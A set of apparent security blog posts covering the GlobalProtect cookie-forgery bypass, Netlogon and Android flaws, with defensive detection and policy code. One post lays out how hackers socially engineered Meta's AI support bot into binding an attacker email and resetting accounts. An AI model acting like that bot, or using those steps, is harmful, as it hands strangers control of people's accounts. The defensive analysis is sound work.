- **Analyst Note:** These developments show organizations continually need to understand emerging ransomware variants and maintain agile, complete incident response frameworks to mitigate their impact.

### Technical Takeaways

- SafePay is the most active group, accounting for 6 of the 23 new victims. It primarily targets Transportation & Logistics and Professional Services.
- BlackX targets diverse sectors, including Healthcare, Professional Services, and a political organization.
- Multiple ransomware groups, including CoinbaseCartel, Krybit, and Nova (RALord), show varied targeting across sectors such as Transportation & Logistics, Professional Services, and Manufacturing.
- Geographically, the United States, Germany, Italy, and France are the most frequently impacted regions.
- The newly analyzed EndPoint ransomware variant uses the Babuk framework to target Windows, ESXi, and NAS environments. It uses ChaCha20/RSA encryption and aggressive tactics such as vssadmin for shadow copy deletion and service termination.

---

## CVE-2026-0257 GlobalProtect Bypass (CVSS 7.8)

- URL: https://purple-ops.io/blog/cve-2026-0257-globalprotect-bypass
- Date: 2026-06-02
- Category: CVE Analysis
- Tags: cve-2026-0257, palo-alto-networks, globalprotect, authentication-bypass, actively-exploited
- Reading time: 5 min | CVSS: 7.8

**Summary:** Palo Alto Networks GlobalProtect CVE-2026-0257, an authentication bypass (CVSS 7.8), is actively exploited, granting unauthorized VPN access.

Palo Alto Networks has addressed an authentication bypass vulnerability, identified as CVE-2026-0257, affecting its PAN-OS GlobalProtect VPN portal and gateway. This flaw enables attackers to circumvent authentication mechanisms and gain unauthorized access to VPN services without valid user credentials.
The vulnerability was initially assigned a CVSS score of 7.8, classifying it as medium severity, though cybersecurity researchers urge organizations to treat it with urgent attention due to its active exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-0257 to its Known Exploited Vulnerabilities (KEV) catalog, showing the threat this vulnerability poses.

Observed exploitation attempts began as early as mid-May, with a subsequent increase in activity. These attacks successfully used the flaw across multiple customer environments, showing the operational impact and the necessity for prompt remediation.

This post details the technical aspects of CVE-2026-0257, its exploitation chain, affected components, and guidance for detection and remediation. The information presented is derived from vendor advisories and independent security research, intended for network engineers and security analysts responsible for maintaining Palo Alto Networks infrastructure.

### What is CVE-2026-0257 and why is it critical?

CVE-2026-0257 is an authentication bypass vulnerability within Palo Alto Networks PAN-OS GlobalProtect VPN products. It allows an unauthenticated attacker to gain access to VPN sessions by forging authentication override cookies. Despite an initial CVSS score of 7.8, which typically denotes medium severity, the operational implications of this vulnerability are considered critical by Rapid7 and Suzu Labs due to its nature and active exploitation.

The criticality of CVE-2026-0257 stems from an attacker's ability to establish an unauthenticated VPN session directly into an organization's internal network. While the base CVSSv4 calculation may factor in direct impact primarily as a VPN connection, the downstream impact to the underlying network makes this a severe event.
Security researchers at Rapid7 explicitly advise organizations to treat this flaw as a critical vulnerability, stating that an authentication bypass in an edge-facing enterprise VPN appliance can significantly affect compromised organizations. Denis Calderon, CTO and Principal at Suzu Labs, characterizes an unauthenticated VPN session as an administrative user into the internal network as a critical event without qualification.

### Impact

An attacker exploiting CVE-2026-0257 can bypass standard authentication mechanisms for Palo Alto Networks PAN-OS GlobalProtect VPN portal and gateway. This leads to unauthorized VPN access without requiring legitimate user credentials. The primary risk involves an attacker gaining a foothold within the target network perimeter.

Specifically, successful exploitation permits an adversary to impersonate legitimate users and establish authenticated sessions with GlobalProtect gateways. Observed activity shows that in some exploitation instances, attackers were assigned valid VPN addresses, effectively granting them access to the internal network. This network access represents a security breach, offering a pathway to internal resources.

While initial reports from Rapid7 did not observe indications of successful lateral movement from the compromised GlobalProtect devices themselves, the establishment of an authenticated VPN session is a step toward further reconnaissance and lateral movement within a compromised environment. Organizations utilizing Palo Alto Networks GlobalProtect for remote access are at risk if their devices are unpatched and configured vulnerably. The unauthorized access potentially exposes sensitive internal systems and data to adversaries.

### Exploitation Chain

The exploitation of CVE-2026-0257 hinges on a specific misconfiguration within the "authentication override" feature of Palo Alto Networks PAN-OS GlobalProtect.
This feature enables a GlobalProtect portal or gateway to issue cookies to an authenticated user, which can then be used in subsequent communications to bypass re-authentication, functioning similarly to a bearer token. This functionality is not enabled by default. The vulnerability arises when two conditions are met:

1. **Authentication Override Enabled:** The GlobalProtect portal or gateway must be configured to use authentication override cookies.
2. **Certificate Misconfiguration:** The certificate used to encrypt and decrypt these authentication override cookies must be the same certificate utilized for the GlobalProtect portal or gateway's HTTPS service.

Under this specific certificate misconfiguration, the system trusts decrypted cookies without adequately verifying their authenticity. If an administrator reuses the same certificate for both HTTPS services and authentication cookie encryption, an attacker can obtain the certificate's public key. With this public key, an adversary can then generate forged authentication override cookies. These maliciously crafted cookies are subsequently accepted as valid by the vulnerable PAN-OS VPN gateway, allowing the attacker to establish an authenticated VPN session as an impersonated user.

Rapid7 successfully developed and demonstrated a Proof-of-Concept (PoC) tool validating this attack method. Their PoC showed that a forged cookie could be accepted by vulnerable GlobalProtect gateways, leading to the successful establishment of authenticated sessions. This capability directly correlates with observed in-the-wild exploitation. Rapid7 documented successful attacks across numerous customer environments beginning around May 17, with a second distinct wave of activity noted on May 21. These real-world attacks involved adversaries using forged authentication cookies to impersonate valid users, some of whom subsequently received VPN addresses and established internal network connectivity.
CISA's addition of CVE-2026-0257 to its Known Exploited Vulnerabilities catalog further confirms active exploitation. This vulnerability represents another instance of security issues affecting Palo Alto Networks products under active attack, a trend discussed in our prior analysis of another Palo Alto PAN-OS vulnerability (CVE-2024-3400) and its active exploitation.

### Affected Products and Versions

The vulnerability CVE-2026-0257 affects the Palo Alto Networks PAN-OS GlobalProtect portal and gateway components. The vendor advisory for CVE-2026-0257 states that the flaw impacts various versions of PAN-OS. While the source material indicates these versions are listed in the official Palo Alto Networks advisory, the research findings provided do not enumerate the specific version numbers or ranges. Organizations should consult the official Palo Alto Networks security advisory for a definitive list of all affected PAN-OS versions.

### Detection

Detecting exploitation attempts related to CVE-2026-0257 involves monitoring for anomalous VPN authentication and connection patterns, given that the attack vector involves forged authentication cookies. The core challenge is that the forged cookies are accepted as legitimate by the vulnerable system, making detection of the forgery difficult without specific telemetry. Key areas for detection include:

- **Authentication Logs:**
  - Monitor GlobalProtect authentication logs for successful logins from unusual or unexpected source IP addresses, especially those not associated with known organizational VPN users or locations.
  - Look for a high volume of successful VPN authentications within a short period from a single source IP that is not typical for legitimate users.
  - Investigate successful authentications that occur outside of normal business hours or from geographic regions not aligned with employee travel or remote work policies.
  - Correlate successful VPN logins with subsequent activity logs from the same user account for any immediate suspicious actions that deviate from established baselines.
- **VPN Connection Metrics:**
  - Observe the assignment of VPN addresses to unknown or suspicious user accounts.
  - Track the total number of concurrent VPN connections; significant spikes might indicate unauthorized access, especially if not correlated with legitimate business needs.
  - Analyze bandwidth usage and data transfer patterns for VPN sessions. Unusual data egress or unexpected internal network scanning originating from a VPN-assigned IP address can be indicative of compromise.
- **System Configuration Audits:**
  - Regularly audit GlobalProtect portal and gateway configurations to verify whether the "authentication override" feature is enabled.
  - Specifically check the certificate configuration. Confirm that the certificate used for encrypting and decrypting authentication override cookies is distinct from the certificate used for the GlobalProtect portal/gateway's HTTPS service. A misconfiguration here is a direct indicator of vulnerability.
- **Network Flow Data:**
  - Analyze NetFlow or IPFIX data for connections originating from VPN-assigned IP ranges to internal network segments that are typically restricted or not accessed by VPN users.
  - Look for lateral movement attempts from VPN-connected devices to critical internal assets, domain controllers, or sensitive data repositories.

Increased scanning activity targeting Palo Alto Networks products, as discussed in our analysis of the broader threat environment for Palo Alto products, should prompt heightened vigilance for such authentication bypass attempts.

### Remediation

Addressing CVE-2026-0257 requires immediate action to prevent or mitigate active exploitation. Remediation involves applying the vendor-supplied patch. In situations where immediate patching is not feasible, specific workarounds and mitigations can reduce exposure.
#### Patching

- **Apply Vendor Patch Immediately:** Organizations should apply the official patch released by Palo Alto Networks for PAN-OS GlobalProtect as soon as possible. This is the recommended solution to eliminate the vulnerability. Consult the official Palo Alto Networks security advisory for the specific patch versions relevant to your deployment.

#### Workarounds and Mitigations

If immediate patching is not possible, the following mitigations can reduce the risk of exploitation:

- **Dedicated Certificate for Authentication Override Cookies:** Generate a new, unique digital certificate specifically for encrypting and decrypting authentication override cookies. Ensure this dedicated certificate is stored securely and not reused for any other service, especially not for the GlobalProtect portal or gateway's HTTPS service. Strictly avoid sharing this certificate with other features or users within the network infrastructure. This separation prevents attackers from using an exposed HTTPS certificate to forge authentication cookies.
- **Disable Authentication Override Entirely:** Access the configuration settings for the GlobalProtect portal and gateway. Locate the "authentication override" feature options. Disable this feature completely by unchecking all options related to both the generation and acceptance of authentication override cookies. This removes the attack vector entirely, though it may require users to re-authenticate more frequently.
- **Monitoring:** Implement enhanced monitoring of GlobalProtect VPN authentication and session logs. Look for any anomalous login patterns, such as connections from unexpected geographical locations, unusual times, or unknown user accounts. Monitor for any suspicious activity originating from newly established VPN sessions, including attempts at lateral movement or access to sensitive internal resources.

These steps, with patching as the priority, are important for securing Palo Alto Networks PAN-OS GlobalProtect deployments against CVE-2026-0257.
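The log review and the configuration audit recommended above, as an added example (not vendor tooling or anything from the advisory): the key=value log format, the config field names and the thresholds are assumptions chosen for illustration, and the sample events are constructed.

```python
"""Review GlobalProtect-style authentication events and portal config for CVE-2026-0257.

Added example, not vendor tooling: the key=value log format and the config field names
below are constructed for illustration (assumed, not the real PAN-OS schema). Adapt
parse() and audit_cert_reuse() to your exported logs and configuration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) geo=(?P<geo>\S+) "
    r"result=(?P<result>\S+)(?: vpn_ip=(?P<vpn_ip>\S+))?"
)


def parse(lines):
    """Turn constructed log lines into dicts; timestamps become datetimes (local time assumed)."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            events.append(ev)
    return events


def find_anomalies(events, allowed_geos, business_hours=(7, 20),
                   burst_users=3, burst_window=timedelta(minutes=10)):
    """Apply the log checks from the detection guidance to successful authentications.

    Returns (rule, detail) pairs for: logins from geos outside where staff work,
    logins outside business hours, and many distinct users authenticating from one
    source IP in a short window (the shape a forged-cookie campaign would produce).
    """
    findings = []
    successes = [e for e in events if e["result"] == "success"]

    for e in successes:
        if e["geo"] not in allowed_geos:
            findings.append(("unexpected_geo", f"{e['user']} from {e['src']} ({e['geo']})"))
        if not business_hours[0] <= e["ts"].hour < business_hours[1]:
            findings.append(("off_hours", f"{e['user']} at {e['ts'].isoformat()}"))

    by_src = defaultdict(list)
    for e in successes:
        by_src[e["src"]].append(e)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["ts"] - first["ts"] <= burst_window]
            users = {e["user"] for e in in_window}
            if len(users) >= burst_users:
                findings.append(("login_burst", f"{src}: {len(users)} users within {burst_window}"))
                break
    return findings


def audit_cert_reuse(config):
    """True when the vulnerable precondition holds: authentication override is enabled and
    the cookie-encryption certificate is the same object as the portal/gateway HTTPS cert."""
    if not config.get("auth_override_enabled", False):
        return False
    return config.get("cookie_encrypt_cert") == config.get("portal_ssl_cert")


# Constructed sample log (RFC 5737 documentation addresses; geo "ZZ" is a placeholder
# for a region where the organization has no staff).
SAMPLE_LOG = [
    "2026-05-17T09:12:01 user=alice src=198.51.100.10 geo=US result=success vpn_ip=10.20.0.5",
    "2026-05-17T03:40:12 user=bob src=203.0.113.7 geo=ZZ result=success vpn_ip=10.20.0.6",
    "2026-05-17T03:41:02 user=carol src=203.0.113.7 geo=ZZ result=success vpn_ip=10.20.0.7",
    "2026-05-17T03:41:55 user=dave src=203.0.113.7 geo=ZZ result=success vpn_ip=10.20.0.8",
    "2026-05-17T10:05:00 user=erin src=198.51.100.22 geo=DE result=failure",
]
ALLOWED_GEOS = {"US", "DE"}

# Constructed config fragments: the first reuses the HTTPS certificate for cookies.
VULNERABLE_CONFIG = {"auth_override_enabled": True,
                     "cookie_encrypt_cert": "gp-portal-cert", "portal_ssl_cert": "gp-portal-cert"}
HARDENED_CONFIG = {"auth_override_enabled": True,
                   "cookie_encrypt_cert": "gp-cookie-only-cert", "portal_ssl_cert": "gp-portal-cert"}
DISABLED_CONFIG = {"auth_override_enabled": False,
                   "cookie_encrypt_cert": "gp-portal-cert", "portal_ssl_cert": "gp-portal-cert"}


def review_sample():
    """Run both checks over the constructed data; returns (findings, config_results)."""
    findings = find_anomalies(parse(SAMPLE_LOG), ALLOWED_GEOS)
    configs = {name: audit_cert_reuse(cfg) for name, cfg in
               [("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG),
                ("disabled", DISABLED_CONFIG)]}
    return findings, configs


if __name__ == "__main__":
    findings, configs = review_sample()
    for rule, detail in findings:
        print(f"{rule:15} {detail}")
    for name, reuses_cert in configs.items():
        print(f"config {name}: {'VULNERABLE' if reuses_cert else 'ok'}")
```

A forged cookie produces a success record indistinguishable from a real one, so none of these rules proves forgery; they narrow the set of sessions worth correlating with the VPN-address assignments and flow data discussed above.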
### Technical Takeaways

- CVE-2026-0257 is an authentication bypass vulnerability affecting Palo Alto Networks PAN-OS GlobalProtect VPN portal and gateway components.
- The vulnerability carries an initial CVSS 7.8 score, but its active exploitation and operational impact warrant attention from security teams.
- Exploitation uses a misconfiguration where the same certificate is used for both the GlobalProtect HTTPS service and authentication override cookie encryption.
- Attackers can forge authentication override cookies to gain unauthorized VPN access, potentially leading to internal network infiltration.
- Immediate remediation involves applying the vendor-supplied patch or implementing specific mitigations such as using a dedicated certificate for authentication override cookies or disabling the feature entirely.

---

## Pro-Iran Hackers Exploit Meta AI to Seize Instagram

- URL: https://purple-ops.io/blog/pro-iran-hackers-meta-ai-instagram
- Date: 2026-06-02
- Category: Threat Intelligence
- Tags: none
- Reading time: 11 min

**Summary:** Pro-Iran hackers exploited Meta's AI support bot to compromise high-profile Instagram accounts, demonstrating a new social engineering vector.

An attack targeting Meta's AI support assistant bot has enabled pro-Iran hackers to compromise several prominent Instagram accounts, including those associated with the Obama White House and the Chief Master Sergeant of the U.S. Space Force. The exploitation, which surfaced with instructions circulating on Telegram on May 31, 2026, allowed threat actors to bypass traditional security measures and execute unauthorized password resets and account takeovers. This incident shows a new area in social engineering, where artificial intelligence interfaces designed for user convenience become avenues for malicious activity.
The method used a critical design flaw in Meta's AI chatbot, allowing attackers to trick the automated assistant into initiating account recovery procedures for unsuspecting targets. This led to the defacement of the high-profile accounts with pro-Iranian imagery and messages. This showed the potential for significant reputational damage and the ease with which AI systems can be manipulated when not adequately secured against social engineering tactics. Meta confirmed the issue and swiftly deployed an emergency patch to mitigate the vulnerability and secure affected accounts.

This AI-based social engineering campaign is among several critical cybersecurity developments observed in the last 24 hours. Security agencies and researchers are dealing with active exploitation of a severe remote code execution flaw in Windows Netlogon, an authentication bypass in Palo Alto Networks GlobalProtect VPNs, and a zero-day vulnerability impacting the Android Framework. These incidents collectively show a dynamic threat environment characterized by innovative attack vectors and persistent targeting of foundational software and network infrastructure.

### How did threat actors trick Meta's AI assistant?

Pro-Iran hackers successfully manipulated Meta's AI support assistant bot through a series of social engineering steps. Its design facilitated unauthorized account takeovers on Instagram. The method, widely shared and demonstrated in videos on Telegram channels, hinged on the bot's willingness to add a new email address to an existing account as part of its standard password reset workflow. This approach bypassed complex technical exploits by relying on the chatbot's conversational capabilities.

The attack typically began with the actor using a Virtual Private Network (VPN) to establish a connection from an IP address geographically close to the target account's usual login location.
This step aimed to make the subsequent password reset request appear more legitimate to automated security systems. Then, the attacker would initiate a password reset for the target Instagram account and select the option to engage with Meta's AI support assistant for assistance. The AI bot, designed to simplify account recovery, became an unwitting accomplice in the compromise.

During the chat, the attacker would instruct the AI bot to link the target account to a new, attacker-controlled email address. The bot, seemingly programmed to assist with account access issues, would then send a one-time verification code to this newly linked email. With this code, the pro-Iran hackers could complete the password reset process, gaining full control of the Instagram account. Evidence of the successful attacks, including screenshots of defaced accounts featuring pro-Iran messages, was subsequently posted on Telegram, showing the exploit's effectiveness.

Meta responded quickly to the emerging threat, deploying an emergency patch over the weekend of June 1, 2026, to address the vulnerability within its AI support system. Company spokesperson Andy Stone confirmed on X (formerly Twitter) that the issue had been resolved and that all impacted accounts were being secured. Cybersecurity analysis from TheCyberSecGuru.com indicated that no backend database breach occurred; the weakness was confined to the social engineering of the AI interface. Critically, accounts protected with multi-factor authentication (MFA), even simple SMS-based codes, were largely impervious to this particular exploit. This shows MFA as a strong defense against such social engineering techniques.

### What is the impact of the actively exploited Windows Netlogon RCE?

Threat actors are actively exploiting CVE-2026-41089, a critical stack-based buffer overflow vulnerability in Windows Netlogon, posing a significant risk of remote code execution (RCE) on targeted domain controllers.
The Centre for Cybersecurity Belgium (CCB) issued a warning on June 1, 2026, confirming the active exploitation in the wild and urging immediate patching of affected servers. This vulnerability, which carries a CVSS 9.8 score, allows unprivileged attackers to execute code on sensitive Windows Server systems without requiring prior authentication or user interaction. The Netlogon service, a core component of Microsoft Windows Server, is responsible for authenticating users and services across Windows domain-based networks. Its critical role means a compromise can grant attackers deep access and control over an entire network infrastructure.

All currently supported Windows Server versions, including Windows Server 2025, are susceptible to CVE-2026-41089. Microsoft initially patched this flaw during its May 2026 Patch Tuesday, describing the attack vector as a specially crafted network request that causes improper handling by the Netlogon service, leading to arbitrary code execution. This particular vulnerability was discovered by Windows Attack Research & Protection (WARP), an internal offensive cybersecurity and engineering research team at Microsoft.

The urgency communicated by the CCB emphasizes the direct and severe threat this RCE poses to organizations globally. Active exploitation of such a fundamental service shows the persistent targeting of core enterprise components. Addressing critical Netlogon RCE vulnerabilities is important for maintaining network integrity, as detailed in discussions around Netlogon RCE CVE-2026-41089 and other Windows Server RCE vulnerabilities. While specific threat actors exploiting CVE-2026-41089 have not been publicly identified by Microsoft or the CCB, the widespread nature of Windows Server deployments means a broad range of entities could be at risk.
The successful exploitation enables attackers to gain system-level privileges on domain controllers, potentially leading to full network compromise, data exfiltration, or the deployment of ransomware. Organizations must prioritize applying the May 2026 security updates to prevent attackers from using this critical flaw.

### How are attackers bypassing authentication in Palo Alto GlobalProtect VPNs?

Attackers are actively exploiting CVE-2026-0257, an authentication bypass vulnerability within Palo Alto Networks' PAN-OS GlobalProtect VPN technology, to gain unauthorized network access. This flaw allows adversaries to bypass authentication mechanisms and establish VPN connections without valid credentials, enabling them to impersonate legitimate users and potentially access internal network resources. Rapid7 observed successful exploitation "across numerous customers" as early as May 17, 2026, prompting the Cybersecurity and Infrastructure Security Agency (CISA) to add this flaw to its Known Exploited Vulnerabilities (KEV) catalog on May 29.

The vulnerability affects the GlobalProtect portal and gateway components of PAN-OS software across various versions. Exploitation requires specific configuration conditions: firewalls must have both authentication override cookies enabled and a particular certificate setup. Specifically, the flaw becomes exploitable if the certificate used to encrypt and decrypt authentication override cookies is the same certificate used for the GlobalProtect portal or gateway's HTTPS service.

While Palo Alto Networks initially assigned a CVSS score of 7.8, Rapid7 researchers have urged organizations to treat it as a critical vulnerability due to its active exploitation and the significant impact an authentication bypass on an edge-facing VPN appliance can have. Rapid7's analysis detailed the exploitation mechanism, observing two distinct waves of attack activity.
Initially, attackers utilized forged authentication cookies to impersonate legitimate users and authenticate to vulnerable GlobalProtect gateways. A second wave of activity on May 21 showed evidence of attackers being assigned VPN addresses and subsequently gaining access to internal networks. This occurs because, under certain configurations, the system trusts decrypted cookies without verifying their authenticity. If administrators reuse the same certificate for both HTTPS services and cookie encryption, attackers can obtain the certificate's public key, generate forged cookies, and the VPN gateway will accept them as valid.

To mitigate CVE-2026-0257, Palo Alto Networks has released patches, and immediate application is strongly advised. If patching is not feasible, organizations should implement alternative mitigations. This includes using a dedicated, securely stored certificate exclusively for authentication override cookies, ensuring it is not reused for other features or shared. Disabling the authentication override feature entirely by unchecking all related options in the GlobalProtect portal and gateway configuration is another recommended measure to prevent exploitation.

### Which Android zero-day is under targeted exploitation?

A critical zero-day flaw, identified as CVE-2025-48595, within the core Android Framework component is currently under limited, targeted exploitation by cybercriminals. Google confirmed the active exploitation as part of its June 2026 security bulletin, urging users and administrators to apply the latest patches without delay. This vulnerability, stemming from a dangerous memory management error, specifically an integer overflow, poses a severe risk, potentially allowing threat actors to achieve code execution and gain full control over compromised mobile devices.
The flaw's presence in the Android Framework makes it particularly concerning, as this core component underpins the operating system's functionality across a vast ecosystem of devices. Successful exploitation of CVE-2025-48595 requires no user interaction, making it a "zero-interaction" vulnerability and increasing the urgency of applying security updates. The full June 2026 security bulletin from Google addresses a total of 113 vulnerabilities across multiple software layers, with 18 critical flaws patched that could otherwise lead to complete device takeover.

Beyond the Android Framework, the June 2026 security update also includes vital patches for subcomponents from key hardware vendors such as Qualcomm, MediaTek, and Unisoc. This broad coverage aims to secure the diverse Android ecosystem against a wide array of threats.

For users, devices running Android system version 10 or later are configured to automatically receive updates via Google Play services. However, manual verification of the patch level is essential to confirm remediation. To ensure protection against this zero-day and other documented threats, Android devices must have patch levels dated June 5, 2026, or later. Maintaining strict patch hygiene is a crucial defense against advanced mobile threat groups and the continuous emergence of new vulnerabilities. The limited, targeted nature of the current exploitation does not diminish the potential for wider campaigns, which shows the need for immediate action across all Android deployments.

### Technical Takeaways

- The exploitation of Meta's AI support assistant demonstrates a significant shift in social engineering tactics, targeting AI interfaces as new attack surfaces for account compromise.
- The active exploitation of CVE-2026-41089, a critical RCE in Windows Netlogon, shows the ongoing and severe threat posed by vulnerabilities in core enterprise infrastructure components.
- Authentication bypass vulnerabilities, such as CVE-2026-0257 in Palo Alto Networks GlobalProtect VPNs, continue to be high-priority targets for threat actors seeking initial access to corporate networks.
- Zero-day flaws like CVE-2025-48595 in the Android Framework show the persistent risk of remote code execution on mobile devices, even when exploitation is initially limited and targeted.
- Strong multi-factor authentication (MFA) remains a fundamental security control, proving effective in preventing account takeover attacks even when novel AI-based social engineering techniques are employed.

### How the Meta AI Social Engineering Attack Worked

The attack exploited a fundamental trust gap in Meta's AI support infrastructure. Threat actors crafted carefully worded requests to the AI chatbot, mimicking legitimate account recovery scenarios:

- Impersonation prompts convinced the bot the attacker was the account owner
- Automated password reset flows were triggered without secondary human verification
- Telegram-distributed scripts standardized the attack for wider replication
- The bot lacked behavioral anomaly detection for repeated recovery attempts

This technique required no malware or phishing infrastructure — only conversational manipulation.

### Indicators of Compromise and Affected Targets

Security researchers identified several patterns across compromised accounts that defenders should monitor:

- Sudden profile photo and bio changes to pro-Iranian imagery
- Unauthorized password reset emails sent to legitimate account owners
- Account activity originating from Middle Eastern IP ranges
- High-profile targets included government-adjacent and military-affiliated accounts

The Obama White House account and U.S. Space Force Chief Master Sergeant profile were among confirmed victims. Organizations should audit admin account recovery settings immediately.
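Seen from the defender's side, the trust gap described above (a bot that binds a new email during recovery and mails the code there, with no second check and no throttling) becomes a policy gate in front of the recovery assistant. This is an added example, not Meta's code or a description of its fix; the account fields, action names and the two-attempt limit are assumptions.

```python
"""Policy gate for an automated account-recovery assistant.

Added example, not Meta's code: it implements the defensive pattern the incident points
to (a support bot must not bind a new contact channel or stand in for MFA, and flagged
accounts get a human). Field names and thresholds are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Account:
    handle: str
    mfa_enrolled: bool
    high_value: bool              # verified, official or admin accounts flagged for review
    recovery_contacts: frozenset  # emails/phones already bound to the account


@dataclass
class RecoveryRequest:
    account: Account
    session_id: str
    action: str            # "reset_password" or "add_recovery_email"
    target_contact: str    # where the bot was asked to send the one-time code
    geo_near_usual: bool   # source looks local to the owner; attackers forged this via VPN


class RecoveryGate:
    """Deny-by-default decisions: ALLOW, DENY or ESCALATE (human-in-the-loop)."""

    def __init__(self, max_attempts_per_session=2):
        self.max_attempts = max_attempts_per_session
        self.attempts = defaultdict(int)
        self.audit = []  # every decision is recorded for later anomaly review

    def _record(self, req, decision, reason):
        self.audit.append((req.session_id, req.account.handle, req.action, decision, reason))
        return decision

    def decide(self, req: RecoveryRequest) -> str:
        self.attempts[req.session_id] += 1
        if self.attempts[req.session_id] > self.max_attempts:
            return self._record(req, "DENY", "rate_limited")
        # The attack hinged on the bot linking an attacker email and mailing the code there.
        # Binding a new contact during recovery is never an automated decision.
        if req.action == "add_recovery_email":
            return self._record(req, "ESCALATE", "new_contact_requires_human")
        if req.target_contact not in req.account.recovery_contacts:
            return self._record(req, "DENY", "contact_not_bound_to_account")
        if req.account.high_value:
            return self._record(req, "ESCALATE", "high_value_account")
        if req.account.mfa_enrolled:
            # MFA-protected accounts resisted the attack; the bot must not become a way
            # around the second factor, so the reset has to go through the MFA flow.
            return self._record(req, "DENY", "mfa_challenge_required")
        # geo_near_usual is deliberately never consulted: network locality carries no authority.
        return self._record(req, "ALLOW", "code_sent_to_bound_contact")


def run_scenario():
    """Replay the described attack sequence against the gate, plus legitimate requests."""
    gate = RecoveryGate()
    target = Account("example_official", mfa_enrolled=False, high_value=True,
                     recovery_contacts=frozenset({"owner@example.org"}))
    ordinary = Account("ordinary_user", mfa_enrolled=False, high_value=False,
                       recovery_contacts=frozenset({"me@example.org"}))
    protected = Account("mfa_user", mfa_enrolled=True, high_value=False,
                        recovery_contacts=frozenset({"me2@example.org"}))
    attacker = "s-attacker"
    steps = [
        ("attacker_adds_email", RecoveryRequest(target, attacker, "add_recovery_email",
                                                "new-mail@example.net", geo_near_usual=True)),
        ("attacker_reset_unbound", RecoveryRequest(target, attacker, "reset_password",
                                                   "new-mail@example.net", geo_near_usual=True)),
        ("attacker_third_try", RecoveryRequest(target, attacker, "reset_password",
                                               "owner@example.org", geo_near_usual=True)),
        ("owner_high_value", RecoveryRequest(target, "s-owner", "reset_password",
                                             "owner@example.org", geo_near_usual=True)),
        ("ordinary_reset", RecoveryRequest(ordinary, "s-user", "reset_password",
                                           "me@example.org", geo_near_usual=False)),
        ("mfa_user_reset", RecoveryRequest(protected, "s-mfa", "reset_password",
                                           "me2@example.org", geo_near_usual=True)),
    ]
    return {label: gate.decide(req) for label, req in steps}


if __name__ == "__main__":
    for label, decision in run_scenario().items():
        print(f"{label:25} {decision}")
```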
### Defensive Measures Against AI-Assisted Account Takeovers

This incident highlights urgent gaps in how AI support tools handle sensitive account actions. Recommended mitigations include:

- Enforce hardware security keys (FIDO2) on high-value accounts
- Disable AI-initiated password resets for accounts with elevated privileges
- Require human-in-the-loop verification for recovery requests on flagged accounts
- Monitor for rapid successive AI chatbot interactions from single sessions
- Platforms should implement rate limiting and intent classification on support bots

Users should review connected apps and active sessions immediately if suspicious recovery emails are received.

---

## Palo Alto PAN-OS CVE-2026-0257 Bypass (CVSS 7.8)

- URL: https://purple-ops.io/blog/palo-alto-pan-os-cve-2026
- Date: 2026-06-02
- Category: CVE Analysis
- Tags: palo-alto, pan-os, cve-2026-0257, auth-bypass, globalprotect
- Reading time: 5 min | CVSS: 7.8

**Summary:** Palo Alto Networks PAN-OS CVE-2026-0257 is an actively exploited authentication bypass (CVSS 7.8) allowing unauthorized VPN connections.

Palo Alto Networks has acknowledged a critical authentication bypass vulnerability, identified as CVE-2026-0257, affecting its PAN-OS and Prisma Access products. This vulnerability, rated with a CVSS score of 7.8, allows unauthorized threat actors to establish Virtual Private Network (VPN) connections by circumventing standard authentication protocols. Although classified as a medium-severity flaw, a high CVSS score indicates a significant potential impact. The vulnerability is concerning due to its active exploitation. This active exploitation requires immediate attention from organizations utilizing affected configurations.
The issue specifically targets firewalls with GlobalProtect portal or gateway configured under conditions where authentication override cookies are enabled and a particular certificate configuration is present. This document analyzes CVE-2026-0257, discussing its implications, exploitation specifics, affected products, detection methods, and remediation steps. Understanding the technical details of this flaw helps network defenders protect their infrastructure against ongoing threats.

### What is CVE-2026-0257 and why is it critical?

CVE-2026-0257 is an authentication bypass vulnerability within Palo Alto Networks PAN-OS and Prisma Access that carries a CVSS score of 7.8. Despite being categorized as "medium-severity," this score typically places it within the "High" severity range, indicating a substantial risk. The vulnerability is critical because it permits unauthorized individuals to establish VPN connections to an organization's network, effectively circumventing the intended security perimeter.

Active exploitation in the wild amplifies the criticality of CVE-2026-0257. Threat actors are using this flaw to gain unauthorized network access, posing a threat to the integrity and confidentiality of systems protected by affected Palo Alto Networks devices. An authentication bypass on a VPN gateway is severe, granting attackers direct entry into the internal network without valid credentials. This access can serve as a primary vector for reconnaissance, lateral movement, data exfiltration, and the deployment of additional malicious payloads.

### What is the potential impact of CVE-2026-0257?

Unauthorized VPN connections to an organization's network are the primary impact of CVE-2026-0257. An attacker who successfully exploits this vulnerability can bypass the configured authentication mechanisms of PAN-OS GlobalProtect portal or gateway, gaining an unauthenticated entry point into the network. This effectively bridges the secure perimeter that VPNs are designed to enforce.
Organizations using Palo Alto Networks firewalls with GlobalProtect portal or gateway configured are at risk, especially if authentication override cookies are enabled and a specific certificate configuration exists. VPN access compromise can lead to several severe consequences. Once inside the network, threat actors can conduct extensive reconnaissance, map network topology, identify valuable assets, and locate sensitive data. This initial access often precedes more sophisticated attacks, including privilege escalation, lateral movement to other systems, data exfiltration, or the deployment of ransomware and other destructive malware. Such unauthorized access directly threatens the confidentiality, integrity, and availability of network resources. How is CVE-2026-0257 exploited? This vulnerability is an authentication bypass. The attack vector specifically targets Palo Alto Networks firewalls configured with a GlobalProtect portal or gateway. Successful exploitation requires two key preconditions: authentication override cookies must be enabled, and a specific certificate configuration must be present on the affected firewall. Authentication override cookies are typically used for a smoother user experience, allowing subsequent connections to bypass re-authentication for a period. However, in this scenario, a flaw in how PAN-OS and Prisma Access handle these cookies, combined with certain certificate configurations, allows an unauthenticated attacker to manipulate the process. This manipulation enables the attacker to initiate a VPN connection as if they were a legitimate, authenticated user, bypassing established security controls and allowing adversaries to "set up VPN connections" without valid credentials. Palo Alto Networks confirmed CVE-2026-0257 is under active exploitation. Threat actors are actively using this vulnerability to gain unauthorized network access. This active exploitation shows organizations must address the vulnerability promptly. 
